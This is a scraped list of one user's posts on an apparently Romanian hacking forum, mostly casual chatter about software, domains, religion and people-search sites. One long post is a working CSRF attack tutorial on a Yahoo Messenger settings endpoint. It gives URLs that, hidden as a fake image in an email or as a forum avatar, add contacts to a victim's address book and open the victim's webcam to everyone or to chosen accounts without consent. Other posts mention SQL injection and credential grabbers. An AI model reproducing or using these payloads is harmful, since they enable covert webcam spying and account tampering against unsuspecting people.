-
Posts
3545 -
Joined
-
Last visited
-
Days Won
19
Everything posted by loki
-
demodat, unele le obtii din sqli pe diverse situri.
-
nu inteleg ce sa urc? momentan am numai partea teoretica, inca nu mi-am facut de cap cu ele, nu am fisiere pregatite. Faza cu webcamul am terminat-o imediat inainte de a scrie tutorialul. Daca e nevoie am eu un host free pe undeva unde mai puneam grabbere. Mai lucrez pe dupaamiaza la ele. Chiar, ce zici de un raid pe la yahoo chats? Dar ar fi bine sa mai pun la punct si altele. Exemplu: studiul unui log care sa salveze numele userului afectat ceea ce nu puteam face inainte cu un IMG ci doar cu iframe. chiar trebuie? http://insider.msg.yahoo.com/go/in5id3r/ (a se observa protectie 1337: in5id3r)
-
Care e problema, ce prostii iti apar? 0xbf9543fe e ok, e in hexa. (32bit compilat cu bcc32) 0xfff4 e ok (16 bit, compilat cu bcc) & nu se folosea din cauza printf ci se foloseste intotdeauna in C pentru adresa variabilelor. Nu iti va afisa niciodata adresa reala, ci adresa in segmentul de memorie in care isi memoreaza datele.
-
sincer? texteditor cu hex editor: mai intai find replace dupa 0x00 cu nimic ca sa nu am textele in unicode si sa pot da search. Am cautat cativa parametri pe care ii gasisem deja pe net si m-am chiorat pana am dat de lista aia (probabil era un array). Am lasat-o exact cum am gasit-o acolo, fara a adauga si ab,ab2, setwc.
-
ms ms mi-era teama ca ma grabeam si ma pierd in idei. Doamne, bine ca m-am facut inteles . E frumos faptul ca poti seta un messenger nu doar furand parola dar si furand o simpla sesiune. Astept pareri despre celelalte setari din mess. Caut o metoda de a adauga useri in friendlist, nu numai contactele din adressbook.
-
Idee: unele forumuri accepta remote avatar. Ia bagati un link confectionat. Ar fi bine sa fie un forum "pe domeniu" si sa stiti niste ID-uri de persoane zgarcite la webcam.
-
Continut: 1) Prezentare 2) Accesarea addressbook-ului 3) Accesarea webcamului fara aprobare 1) Prezentare Toti ati auzit de yahoo insider. Cei mai multi merg pe ideea ca e panarama aia de fereastra care o inchizi cand deschizi mess-ul. Yahoo insider reprezinta insa accesul web la intreg motorasul messengerului. Prin intermediul lui poti accesa diverse setari ale contului, ale yahoo-ului in format XML. Poti accesa address book-ul. Poti lista chat-rooms-urile. In anumite cazuri poti face si setari. Bineinteles ca pentru a putea accesa trebuie sa fii logat. Am facut insa un test simplu si se pare ca cererile le poti face atat prin link direct cat si prin <IMG SRC>. Cu ce ajuta? Inseamna ca pot oricand trimite pe email unui user sub forma unei false fotografii un CSRF care ii va schimba anumite setari. Nu trimiteti link-urile pe messenger. Persoana respectiva poate sa nu fie logata pe browser. Puteti insa trimite un astfel de link trecand printr-un redirect de login in yahoo. Insiderul se acceseaza folosind link-ul: http://insider.msg.yahoo.com/ycontent/?parametri Lista de parametri (incompleta insa) extrasa din yahoo messenger (am dat copy-paste cum am gasit. %s inseamna ca primeste un sir, %d un numar). &langpacks=%slangpacks &slot=%dslottest &ads=%sads ¬ifications=%snotifications &reliablemessaging=%s &emoticonorder=%semoticonorder &emoticon=%semoticons &av=%sav &imscanners=%simscanners &settings=%ssettings &userfeedback=%suserfeedback &modules=%s &defaultplugin=%s &safeobjects=%s &revokedplugin=%s &sidepanel=%s &contenttab=%s &voicesmiley=%svoicesmiley &partner=%spartner &marketing=%smarketing &logos=%slogos &dct2=%s &dct1=%s &getgp=%sgameprowler &audiblemenu=%saudiblerevoked &getwc=%s &chatcat=%s &games=%s &sms=%s &searchbar=%ssearchbar &url=%surls &system=%ssystem &imv=%simvironments &filter=%s &defaultcountry=1 &countries=%s Exemple: fmt=format. Ofera suplimentar numele feed-ului, nu stiu exact cu ce se mai ocupa dar l-am lasat in coada. http://insider.msg.yahoo.com/ycontent/&fmt=2 Observatie: <content time="1266943437"></content> 1266943437 reprezinta numarul de secunde care au trecut de la data 01/01/1970 00:00:00 GMT (ora 2 in RO). Interesant pentru alte cereri, gen addessbook care ofera data la care ai facut un update. Informatii despre chatrooms: http://insider.msg.yahoo.com/ycontent/?chatcat&fmt=2 http://insider.msg.yahoo.com/ycontent/?chatroom_1000&fmt=2 Setarile de webcam: http://insider.msg.yahoo.com/ycontent/?&getwc=0&fmt=2.0&intl=us&os=win&ver=10.0.0.1102?=en-US Addressbook: http://insider.msg.yahoo.com/ycontent/?ab2=1&intl=us&os=win%22&fmt=2 Ca fapt divers sa ne uitam la <farm id="458"/> Amintindu-mi de yahoo cookie generator, ID-ul (458 in acest caz) apare in subcookie-ul Td.SL (sled ID). SL decodat din base64 este de forma 458[0x01]123456789. Lista tarilor si a codurilor telefonice: http://insider.msg.yahoo.com/ycontent/?countries System: http://insider.msg.yahoo.com/ycontent/?system&fmt=2 Imvironments: http://insider.msg.yahoo.com/ycontent/?imv Sms: http://insider.msg.yahoo.com/ycontent/?sms=0 etc... Va mai jucati voi. Atentie insa, presupun ca e posibil sa va dereglati setarile asa ca nu lucrati pe contul de zi cu zi (mi-am stricat eu ceva si nu stiu cum) Acum sa trecem la partea fierbinte: Link-urile de mai jos cum am spus functioneaza atat timp cat persoana este logata in browser. Asta inseamna ca ori deschideti o sesiune in mail, ori trimiteti link-ul la o victima. Cazul 2 sub forma html cu <img src="link"> 2) Accesarea addressbook-ului Sa ne introducem in addressbook: http://insider.msg.yahoo.com/ycontent/?addab=0&fname=Gigel&lname=Coaiegrele&yid=pulamea@yahoo.com&nname=pulamea fname=first name lname=last name yid=yahoo id nname=nickname Verificati addressbook-ul pe http://insider.msg.yahoo.com/ycontent/?ab&fmt=2 http://insider.msg.yahoo.com/ycontent/?ab2&fmt=2 Odata introdus nu va apare imediat in addressbook in yahoo messenger. Dar va apare la refresh in mail->contacts Nu prea inseamna mult dar sa ajungem la partea si mai frumoasa: 3) Accesarea webcamului fara aprobare Intrebarea existentiala CUM SA VEDEM WEBCAMUL FARA PERMISIUNE Raspuns: setam messengerul: messenger->preferences->webcam broadcast bifam allow everyone. Sau bifam always allow the following people to view my webcam si adaugam contul dorit. Cu alte cuvinte: http://insider.msg.yahoo.com/ycontent/?setwc=1&img_quality=10&viewer_access=1&chat_access=1&ignore_view=0&intl=us img_quality=[1-10]. 1=viteza 10=calitate. viewer_access=[0-2] 0 - default: cere voie 1 - lasa pe toata lumea 2 - da voie numai la cei din lista chat_access=[0-1] lasa toti userii din chat sa vada camera sau nu. Asta da pwn la labar! Daca suntem baieti mai "sufletisti" hai sa ne bagam numai noi in lista de persoane autorizate: http://insider.msg.yahoo.com/ycontent/?setwc=1&img_quality=10&viewer_access=2&chat_access=0&ignore_view=1&friends=pulete1@yahoo.com,pulete2@yahoo.com&fmt=2.0&intl=us&os=win&ver=10.0.0.1102?=en-US friends=lista de useri acceptati, cu randurile despartite de virgula ignore_view=[0-1] ignora alte cereri de la cei care nu sunt in lista Pentru verificarea setarilor facute apelati getwc: http://insider.msg.yahoo.com/ycontent/?getwc=1 Bineinteles ca victima va vedea cati useri il privesc, aici depinde de prostia victimei si de norocul vostru. Sper sa gasesc mai multe sa pot continua!
-
Gata, nu mai! rezolvat vreau urgent, azi daca s-ar putea o idee de unde sa imi [b]cumpar[/b] un domeniu EU sau NET. Nu vreau mail nici hosting nici alte facilitati. Iulian, la ce fel de oferta obtii domenii gratis? Exista ceva unde pot cumpara un numar de 2-3 domenii (eventual pe care sa le schimb mai tarziu fara suprataxa cum se face cu subdomeniile gratuite)? Ma tenteaza in ultima instanta un godaddy dar poate stiti ceva mai potrivit.
-
cred ca pe un peer2peer poti avea un avantaj. Altfel sunt si eu curios de rezultat.
-
weird! Nu stiu. teoretic ai putea face un test simplu: conectezi 2 placi de retea pe un switch/router si probezi viteza de retea. Presupunand cazul tau (2 provideri) e similar, merge facut un test dar pe international (undeva unde iti merge cat mai stabil, cu o viteza constanta gen 100kbps/sec) deoarece pe metropolitan viteza e totusi redusa la viteza hardului. In task manager te duci pe networking si din view dai select collumns. Bifezi doar 3: bytes, bytes received, bytes sent si ai monitor de trafic.
-
TUTORIAL: Fa-ti Firefox de sute de ori mai rapid !
loki replied to Krisler12's topic in Tutoriale in romana
aici e putina neintelegere. 1) krisler, exista un topic similar de acu vreo cateva luni. Nu ma chinui sa il caut dar stiu ca in mare sunt aceleasi chestii publicate. E oleaca vechi intr-adevar. 2) ai adunat de pe net cat mai multe setari. Ok. Dar totusi ai copiat, nu ai zis nimic in plus, nici macar tu nu stii ce fac setarile alea. Unele de exemplu nu apar in lista firefox, nu ai precizat ca trebuie sau nu adaugate. 3) daca nu ai copiat de nicaieri si nu ai testat atunci e grav: vrei sa avem incredere? Ok, ai pus ceva util, in cazul asta ai adus din alta parte ceva constructiv. In acest caz nu iti atribui credite ca nu ai dat decat search. Si (acu pentru toata lumea) nu incepeti comparatii de tutoriale. -
Sunt catolic si iti spun eu ca la catolici NU se ia nici un procent din salar. Poate ai auzit de faza despre procentul din impozit pentru care alegi tu unde sa se duca, catolicii alegand biserica. La slujbe se pune cate un leu acolo, fiecare cat are pentru biserica. Chiar nu exista niciun interes financiar sa traiasca popa. Se mai cer uneori pentru reparatii si altele, ceva gen "fondul clasei". Asta atat timp cat un preot catolic ar putea sa nu aiba niciun interes deoarece parohia nu ii apartine, el fiind mutat cam o data la 7 ani. (A si o chestie placuta: la nunta nu a cerut milioane cum face un popa ci a zis simplu: e o taxa fixa de 70 lei). Sunt si exceptii dar alea sunt umane, nu bisericesti. Cat despre Biblie, intr-adevar sunt multe lucruri ascunse din Noul Testament de catre biserica crestina. Asta e, ramane la latitudinea cercetatorilor sa le studieze. Botezul sa stiti ca nu este considerat obligatoriu. Daca noi credem in Dumnezeu automat credem ca un copil nebotezat poarta pacatul crestinesc. Totusi o trecere la o noua religie nu tine cont de botez asa ca nu e nicio pierdere. Si daca te-ar lasa sa decizi singur cand vei fi mare, fii sigur ca decizi dupa ce ti se pare cool la un moment dat, nu vei sta sa le studiezi pe toate sa iti alegi o credinta.
-
in casa de marcat mai apare si numele produsului si ce vor ei sa mai apara. mai sunt si camere de supraveghere preventiv incat daca descopera din timp te cauta.
-
eu inca folosesc versiunea 4 din moft. Nu m-am prins de ceva nou oferit de noua versiune, am folosit 5 doar pentru ca am avut nevoie sa ma conectez la un comp avand versiunea 5. Chiar, ce are in plus?
-
au avut doar noroc, in general ziarele de scandal se mananca intre ei. Ciudata inspiratia cu campionul de masturbare - ciudat si ca a muscat, o stire cu "campion la masturbare este un roman" circula acu vreo 3 ani pe internet in data de 1 aprilie. De atunci e cam penibil ca ziar sa pui botul la o asemenea stire. Toti ziaristii stiu povestea.
-
faza cu fmt=18 era inainte de a-si baga youtube butonul de HD (e un topic despre asta pe undeva pe aici). Sigur nu inseamna acelasi lucru cu HD acum? Pana mea ca oi fi eu baba chioara de la o vreme da pe nici un film de juma de an nu am observat vreo diferenta la fmt.
-
Draga jurnal, pute strada a hormoni. mesele sunt goale cu 'rezervat' pe ele. ma kk in Valentines. Azi bere in familie.
-
sincer de pe situl oficial, downloadat de mine avea 2.664.104. Probabil au pus un update mai nou decat cel postat de symyforever. Amandoua sunt bune. Referitor la Teamviewer insa, pentru a-l diferentia de zecile de metode de penetrare meritau spuse cateva lucruri pentru a motiva topicul. Pentru cine nu stie: Teamviewer ofera metode de conectare la distanta la un alt computer. In plus fata de desktop connection sau remote assistance oferite de Microsoft el nu cere un user separat, sau conturi de msn. Foloseste cu succes o metoda diferita de conectare fata de alte vnc-uri: nu e bazat pe IP ci isi creaza el un numar de referinta incat o conectare este posibila chiar in cazul prezentei unui router, unui firewall. Pe langa accesul la desktopul mousul si tastatura utilizatorului contine si un program de transfer fisiere simplu de utilizat. Pentru a te conecta nu e obligatorie instalarea programului, are optiunea de a fi doar executat. Hmm m-am straduit si eu in graba dar cam asa zic eu ca suna o metoda de a prezenta programul nou gasit pe net. 2 printscreenuri nu spun mai nimic.
-
31++ in martie eu zic ca merge stick.
-
in final la bagat in pagina m-as baga, aici am eu ezperienta. Putem face si o revista. Ca sa fie ca la carte ar merge sa zic niste situri sparte si reparate multumita indicatiilor RST, care vor sa coopereze, si avem si sponsor pentru publicare (orice publicatie se bazeaza si supravietuieste in primul rand datorita publicitatii din subsol).
-
exista deja "bine ai venit". Pentru incepatori. Astfel noii veniti au ocazia sa se prezinte inainte de a calca pe bec si a lua ban.
-
53 apropo, faza cu click-dreapta o puteti face la toate nivele unde trebuie sa plimbi mousul deoarece il ignora 34 lol 10 secunde - din greseala 50 - apropo, cu rosu is numerele din Lost
-
depinde ce cauti. Mie mi-a gasit cam tot ce imi da google si inca ceva in plus. Merge bine cu nume si prenume dar daca vrei nickname alegi cautare dupa user. Incercati si cautare dupa email.
-
mi-e frica sa intreb ce antivirus ai. Probabil ti-a blocat accesul la ele cat timp le-a vazut virusate. Va trebui sa inchizi antivirusul ca sa le rulezi. N-au nika, am Avast. Daca nici asa nu iti merge citeste intreg topicul legat de dll-uri lipsa. Folosesti doar ETS Decoder, celalalt am uitat.
-
Daca vreti sa dati de cineva motorasul asta e mai presus de google. Puneti un nume si un prenume si primele rezultate vor fi de pe cele mai cunoscute situri sociale (hi5, facebook). Pagini frumos organizate sa va duca la fix la persoana cautata. Pipl - People Search Ei isi lauda roboteii deoarece spre diferenta de clasicele motoare de cautare pipl cauta in adancime rezultate relevante, reducand totul la o singura pagina. Aici explica pe larg metoda deep web.